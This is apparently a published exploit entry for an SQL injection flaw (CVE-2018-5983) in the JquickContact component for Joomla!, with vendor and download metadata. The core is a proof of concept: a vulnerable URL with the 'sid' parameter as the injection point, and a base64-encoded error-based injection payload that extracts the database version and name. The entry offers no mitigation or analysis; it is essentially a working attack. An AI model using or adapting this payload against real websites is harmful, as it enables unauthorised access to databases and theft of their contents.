# # # #
# Exploit Title: Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor: http://coderspirit.blogspot.com.tr/2011/07/jquickcontact.html
# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/jquickcontact/
# Download: https://sourceforge.net/projects/jquickcontact/files/latest/download
# Version: 1.3.2.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5983
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jquickcontact&task=refresh&sid=[SQL]
#
# dnR0dGo3YXM4MzNvZDVuYTM3OWVlNDAwcDYnJTIwQU5EJTIwRVhUUkFDVFZBTFVFKDIyLENPTkNBVCgweDVjLHZlcnNpb24oKSwoU0VMRUNUJTIwKEVMVCgxPTEsMSkpKSxkYXRhYmFzZSgpKSktLSUyMFg=
#
# # # #